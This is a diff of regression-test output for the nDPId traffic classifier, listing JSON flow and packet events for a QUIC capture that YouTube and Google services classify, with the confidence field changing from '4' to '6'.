00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02318{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1621432545371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432545371,"pkt":"AAAAAAAAAAEAS1QMCABFAAViYPlAAH4R+r6okEAFCUGp\/O2JAbsFTlWIxP8AAB0IC3jlg9iBHxIANwCHrPC\/4ONhhPa4\/bkucOa0ccMbRx\/dWQUxDvvPbBbSBV+QAXzHkO\/ek8WDdft4J2H6iGctCUVE\/Vd1az8ukuRtgZHkNe9HsjHNPcO9gC3hoF0jI1WUFpr6W\/bvPAMD0ojxS\/Jat1yERFCwK1qTZjHTu5Hq2GxnTFLRrBvKpajRH4mp0PBh9N1EEyOXmqHY8RR8CFuGBAVrGssOFJJLCgoPFYWi4kU+3Er5AjbG6hAThXTq5QSrnvRF2NsfVwKcZH64AJtDNhF1vVsm5Y8FPRr0Bw0OMhHo5TfDD9554NzZqybC30Lzg75oLfpGADza1+jH3enNvlyD\/9OdXxVtLFBPpK+tc1S0j2l24nUXrhfgzMYJSGfusfan3MputzKVw0xaEMSTFnMyVXBwvQvsJpXe\/cfXTGaPcz+n+4PtyXFFeq1VFMb38KcaBIZAXpjtbjsKy1u0drs8\/lS6zg0B+XEXyyVbBHNPSwQzvYAFgbxG5T2f7cZpDXxonb7KKJeiTREIg53VKn6taxqerf\/EROOn+QPkvNTMzD2dTm5TFHSYxLvBV5+O6FgwNIPd9zSQjxu\/PIgbyOa5d1rycolz3RRmObJ7xDqSBQEx9uBtKS475iYE3\/HVHr98HbKghpyBXtrfiFCJfUPvGhf2ZQTE\/2PgBc4nFIolPbu5IHP5jlx9YJheTrRtsN8xZyNylrQiJyWGIJ+sqW7NQD4PtZU8og15AsUXrhsGP3nifKZ2RW8ULO\/zQ4hjXLbXvVPCRMaOfTnRWz16ymzmazGc\/A9WtT81r16LRVyV3KW5BVcHMerZjTINdFBiN2Rss9YE+hg2Bdzx0FHiLD2SJTldPbPASYuxvZBuOv7vGEJxC\/B7ThuZCvaUXSTwfSYdYePG5WL2Y3bz72m1SZEmn+4Kiqq\/h2MEhMWL2wbVTZ8FAX0VWRfwhSMlOHHKMW3u3baADN0N+mh8BW\/zOcs6XrHPEAtq\/4pbenpQ2rrBUepHw7wEl2Gy7TOdtirMeicrvRMH5ROutCuksQv6EbOTonl2eA9Uzw3fk+NLZelZDt7+chmNI0wDo+\/LKiADiMtDwBrUShAJhuyJCYkzqz3+\/I22nE9z8jtSau8DwJe8rGnUypF+QexVaXFHzHrGc8pEc6Gv1V+yd7O9j1BH6SI99CGYQ4qUSe+Qvf17MPqt6Vv5BD2ZiEf2go7Ms8wrYgSzdW2J6h2lnH8T12duhSfnaN+XilOPE6QCReHpz3pNB7sD3txciXal1Cjtz+D52skW92QHoQ6HQJRVcO1F+Nt9Ms6O4a82MSiFPLyQ4+9HZ8XzRNGIA6bYEMtQ2VoveeK36tJK5jcwcf1bd2KXco4wwhd6yGi79yvfAr9Gnfa+nm9EvT23xLYwd6SLl+UW2Yy\/cUnjlQIjkF+Nl2AFUyHKqbZX2R5uA7ATglq8Z5hVDirutJRbMvjB3S6p209yWJX36GoCAlZULNNq4O\/K9HsfmRuSQzzO8vAnTtDfmAG177+f\/BH\/oOcDleRinaIgIUXyhxOMJNHNbCiUdxlGmVs0Kf\/YtICcdSgbpsnkh7sZqaLRn0qnOt+5wry5o8FjthI8Fu2te\/X8Ye4gIOivJjbZs+RLhZQxZWtt03HV6ev4z867dtIUmron46fcA2edbLbHQ119w4dS3GwaljEI9565fGeAZxLwyqZbVZ07sOBYRGxKVWe9qlVpepdG7mzZWTkGm1aG8jBuv1yWlVaWyIe\/5D3F\/Zn\/LsMgNe+1ozo\/g3Qq8MWGLKjZnwl7\/\/\/D"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432545371,"flow_last_seen":1621432545371,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432545371,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60809,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1621432561767,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432561767,"pkt":"AAAAAAAAAAEA737VCABFAAViWJxAAH4RaSaokEAFqVGj4dlVAbsFTh0rwv8AAB0IWitP07hFwPIAAEU0OQ8EdQTKeE\/y3KmcSMkX+qEOqn52RlGrldbICsY\/S34wZNRn+08waAiGjsEVTtahcIPi35YuHK8wq0g59jo9OBg4akM\/IBMGR7R84CJBN461mppY8jQVuZTPgmTRdB2IYpULPqPfoX1v+i9gHbqu5NK3OwzMLconK6EyplQxCPNt5Hf30K95kk3qNJtwkSisClc72nLsoaYauap5qms4Uf\/J91\/kVmZMeIlYa1jjcfZ3z0VI9gHepy0CkQxYfepscIvVGFIBRny+Rr6Mo5Wdi6EIb\/T5QSBed45QkLsJA9gUQEq7M7LKJgg+IKLvJoW43JTt7tWUALAA7xqNg8ZMlYbspeUjoDBFwmTYyCGMZ5bdPdJsCKJjP1zB6Ihkj9HzcCVcVpCt5y5VRUWbI3s+SuMDcnwmhOo2Cnlr0DZfIFBqUld4Y4RY5VqVdeJo7oFXW7AwYc+nzTUTjYB7sFAHoCxtg3W+GcMFoxOtPlRytxdZ5wbadwjKEwqJuIJpIaPT9Hl5ErVl3zaNl7AbKrrPwnZr1V\/c2RNnNxvqBfO2+OD+glALVErSZ8Wgf5WaLzvHB8WMIbmug\/NFM\/SLKtJ\/BaWEqzeoVef0rMzIe7N3WaGlp54AM2gUWArP3379QDPnly3sySsTiCLjmgz\/a\/YAV8iH0MWGhxoXL8uO+18tMZKic96P3qCeZ8y7LR8W+ULC4hM7PW26ZmpzKFTv+x+dXax\/FbNTBDPTQMmIlCH9iOw143\/ImSuF0s3s4JVp4Qr6CGbUM7wVRHYWtzpVhyLQMg81Qv2OEiCnOjzFFBbzp\/0bJKOqHRD4Q\/MvBarEfeFcKiSbAbTSNM8PQgQqkr0ZRwugcr2Ffp+Gn+l7xOOzT42OiObWh\/q5Vz8yxCjvr\/A3rCWwstbOOV346nm7SzYmCeDdLhhv6lnhMiAKqzz9Y+7ejwsae5M2M3swKabBXR4s56U0TQF+O7sfltB20eE597p4k5i6pwoHpILiBDttMLzjO7dc91E1IYlMz1tAgL+S9RvKr72GqDN6ZnJlEhDdKvlV5HT1Hkn9kqkuTTOQ0XHul3D3GFcWCqjADIqlVTcjrCO73smKB0a4uTZQbOIpVVIdV6+6r6fVzLgJO5GsuxJaHTgytCf3she4LLg13wNSfnN1MfvyZUdUQE3f3vPJyjzsirq8bCev5LQkUR9nijtvOuY+AYdDoq9V3BpiAPC\/5krfJFIpYwodSbeepb3MzG81QlFd2eB1ghaJpx0Lkod5SIZJSovz09xRaU2rOvyKR8WRRif52MUKIukeKGfbFHZtrKxCIiJ0BDLx\/i+Ol15n6ZZ7Ufce2YGrldvNoQcB39pF13M2xxh0ga17XgFyOLwQChgB\/CIi0XzrAp5k8ZwTJaYDryhvEy+QLvWWBRLc0grxIicpNZZajbTUE+i952VB6IrVqmtuYgLUVGpF7YVtpu59m6nPy+7bYq81ByFXlwxoThbET2t5Xwh4tKj2kEGlA4a\/A2nbUyPihPkju\/hgap4rdGkxuysnOZqlWiIRDL9NAexX29gx1xqsSqsDeI+D4cJhsXJ2P5ihR\/sHA3rpBQJRT+rRYmYWzUeoZmXY\/d+n2pZTXUwAQIcY2gZ61ZU3fymYydiwOlVXMdRNyaSlDGExGzYNiSdgFAynC4TF209BUTK\/I6hsurJHhtkEW4PNMZmrFy1b37DXFZ2+N3Li+vjPgOwB0NUwzN9CtFWQGGZdoOh+DGOlpM73XGxkM8fpT6xsMV7tcylekSF9KrwkYBnC"} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432561767,"flow_last_seen":1621432561767,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432561767,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"169.81.163.225","src_port":55637,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1621432687153,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432687153,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+xVAAH4RF\/KokEAFcfqJ88+HAbsFTkZ0zv8AAB0IUFF8ZbsplgcANwA8pfqGZZe+H8YbVevtEq0uW3yOyXta0h88u9QuYUdq8LE0sDqOmyGjxvU7MaDIbVqplgETW\/NE\/cvaMSDgL9CHXru0efaH26aRrBGKK\/el8kZH3UaZy\/b9fmgdZ9mmXS5myo5Uucklk32jY0nKiPx7OwGdOw\/13D\/yhjhsJPO9lxfnt\/xrx5w2VANECESU2NEWkJRxhIc\/dJshO3z01DVcn1fIfmiyloSgZUd+\/HKai9If5RANhfzeQXioPpPbOoecz6if3Z3FtQKFLotx+aOWuKKAGGc0cyrUXi77xeLDAxjE6tOM9yaGQcFFgEY\/SOBwtvWDdb9NoQWO7p11EUZ+wl\/rZ5GXlvPXsY8mh6Clgitpg7R24nHSXQN0B06887mB4HnoNDeAmXGTVqNUO5Hwpt4Nv5fOd\/uAYlaCVVGeZWnQSUt3FSt6UlJWCYhZFk40gfKSsTtWeOQIhnNtUP5+zwa3UUHni3XmISHlQzbBz\/bS0jB08K8r4MbQ1k++PfwYjBxXo33Ojv377xL3kEWdt7dqkANX+xOLqZ4hYjJtVeJE6KaWK5kxNrvgI4+Wbq72iTCPnuWu4Yc+04d7b\/zeICLVlQ4UJomN5dkhXIvTFKQ7NG0K7rxpiRWOcSPWgsWX4wFJhAUCcqoK9wfw0ZMIl8zrsdDk5l5X+x8MTT+SQICOrIXn0ZSpTbD3Xt68fdgFWkqOjWnFQHPy3Iy3RczgAeN7wIYFfuCnnC6ME+5Pu63Pk2iPfP7TzEvCq+iYnwhXaGT1sDWUzQDz9Ea\/yyYCqRPN\/gqIRL+pXgs9ex+9iKQaMTnc0vlqASRWWCZPNc2rf\/Q9eHHk4W3NPoX3ez56VofMyV9x8Kx7xSgFDFLRY80kBMgLWMJDfi6woBPhXKsM4wd2mLvh7\/wW+nGUcZMc5X3DVUUiDmGzvF7qBR8QzheMOnqAvFyKMGSpJJ5Ps0oPIRQEBEONuBTdMtasa9lBz6DGcqXqeY1rs9cdoTZaeh1CgiDqdZdsgdaBb3PTBxELCiZg3Mjn2Ot0f4S6rODt1khthCXa+j8H7di6Uu0LktCHPUKJullar39r7GXB33cmiLI1UYXrrTv25S4DhWZdTftmpBXDFOwlNLMeatZGrEKK7zLzeIx5rioedbNSfdLfUi9tYWh0gPPFQENtKlJVn1Gyol7zm\/QqNOvgomZt6RUw\/PI2OFl+9zsCQmj6uTnByKe6c\/tZrUT6N2R5lvUzAGZIClGGsFR4e4cmvkmiIdEOo+lEW9ZEBcUKvujsGgkc9cAkZMsNkFQc\/PgQpvfYqWlnRu5wnZk6Sv5jPr2LTnEt\/ndr7UGSNAG3nto3fdM2CWZImFEJlzxZcJ6Pjr\/DX1+sbuL0VJWf56xETi07cgoGnD9splJhqvifjBi5hE6IKs1smgIDugqMeU+hKZgmx0tlIBEDohI\/weDtB6ZoTNVzeCrtE9Ne5sHna3EbB6mrF1wOyF+v7JqhFt1AklERk8cvtUnrNY9KDllJiAIoy8SJ+lKPlC22sDEHqftvcIo8mS2cppG0wllO2Q1TclT9pjsn1nIhooutFD14OqIrVo62MaGWaUpxzW8sZy1SVksc06sGqCdoo8s5qQi7Gz1K7yZhZo6W82as73l\/bfhqszTmMajohCA0Y9MFT\/+c5ticaJcK8VZzHx\/4ndP6BdrrmvIMXm4MvPY0XbZvr4Jyhd\/FOn6vdTJUGitV6mUWBc8Qn4h5NGpTVY3jRUrKJ\/3UHMEn9NXaFjwDa+i\/lDWeXt3KF5YT"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432687153,"flow_last_seen":1621432687153,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53127,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432687153,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432793457,"flow_last_seen":1621432793457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432793457,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"152.128.87.238","src_port":50073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1621432793457,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432793457,"pkt":"AAAAAAAAAAEAgb5NCABFAAVi1J5AAH4RSeiokEAFmIBX7sOZAbsFTp9JxP8AAB0I7Hz6xe0rqSIANwDXZeiBOis1quzsT\/obGG0x+3XLqfDbWYiwJuWBqOtEfIn\/ZPOFbr4OpvKQaBk8YcaDhmjs8G9E\/bYLKxuZyad2DEvamcZFVtntEFziXhXn3+pQrDq\/AMQ6LmeqWyyt9eA3XDKtJ4xY1Bc6e9UD8t6D7Sgm5IQhV9SFnw3BxVaQkrl6hR\/dDVS5UMps0rHJiqJfxJX9XuDk7Hfp1cVZA24xlVPWJVRY2UAeIc2Zve2M7H6lmFiRWRA5qAccgPetxVIxOWgKJZ9rY8EXMEmXdS70H4KMbgsfK9Uk6fu\/osiRJWk7Bzz5wQrxWL6dXRJrXxAa2jPXQHVxa7bP8D1pdmGboyWwgZYxklQYJNVQxDA\/GDYY6fvGJ263gPtNp9NnfpJaf3BoWuUPhFP8HvGyQZuIQF1wb9fZXWZ3QHFoIdW68Pqhjnp6kLZ063TmjYYZ4slUYelhsLCLrNb\/dwHKwXnK6PjPM5zy5oxTVIu9HQIZmJtKxSSYJD+ceykV8\/K7hgP3LMhoq\/OjNgE2xqsoCuttGgVjAKWqToZ2SAfQBRXiQmcgW52dCG7Z5HhuDaq\/hB4oOHiiK4\/S0BBNT5M+Pb8ByPul+j0MGVAtYn6fTilvMPrguU47PCHZjjk0z9Wnk26G01zXhhAY0ar4RNDDEzDjmKfqXKVxSDUlPPUIWjq1afjceK2zb3JDwK58fh96mr6zd+glDvfAbQkGN5MH6eMa\/9wzaGAa3ufoLka8Lxli3yUdMj\/VZs9FXs\/jqxxOPuE\/dCtF2asx1eqF6Dv896U\/rfqEfRamU8Y4w+RgEO1CTD7sshtD1igsz3xv7fwlgvoMBlSMrIYm2kXO5Mm4rUbFhOvxSUXvhCAz80phe1BldOJ\/juAj8qGCoV+gQOWqnuDFHTVXEB73DtcArIBGJd9D++3m82t+emgLBdig+H7CGHczwalju210OQ3B+NgGpSSFA2TExawDMw2BskyWcMWOAJB+1YPrBoF06DgneuWy+G1EzSXWEKGoBP9Hvvi3iiO3IcHdBaysDd3G163RjNVGtjxLv3H2wGiF8W8BtUy8x\/4x0t8GKV8DeHoRZAPR1VW9jsM9BHk3UFKs6e+5DG41zNnmrJMvsQCLdE7Mc8w4ELvM4HhyshxInLs7aAqATi\/cJpkJVFPEVzRSH2iJPYmG8HdHW+MR+R4aifCxPvUJqcMbXFiSZcU+MJ70p7YnFW\/gfvm4Ux4DbVMAkNpUImzqnQsubAKj0w\/8ulR5Wetc3zilx2pLq7DZxLdXVFjLXuRQmY2yCeGisGB5PUkdsGOp1IyO0idKFB6vegqD53wg8CaYEO5x0Hmz4Pk70XwPcVkukm1ulZSYY\/nmgbz541r2QMShd26Vqrvyg\/J8rOTVuiAbPswYJnJk0xDz7XloJ2aoIPRONK5nlUihp2bOw9Nuxf36SB6k0LSj\/s4mNxG1QNaEf5XxQTpLl1PynNmmtwiukSv5w+u6Dh3MmLJERlHtMy3fg6A3dZn2rVplpcATmPl3e6JcqSXfEQHaMUL9vqZgy\/h073US6J03VMt+\/bO+qzfltNYykBXZikfo2Jeay4vIVade7edcMHLP0kMMz8YzuMkFj5mSEOozDdFrwgdubKvf0WUvGC9sG0GJQuA6K0zS0AdH6\/IDWTjjKCqm0CNfUV3pEg1fuSIaLXiC27HEebsSGbBEc86cnhXJ6xcni7lN18XwT\/wRTUuZ4kfbyFf\/WQSlRJNS7ifRduPwfHvUgAkTi6eqDziLvnVkJ6BbPbv+fYGh"} 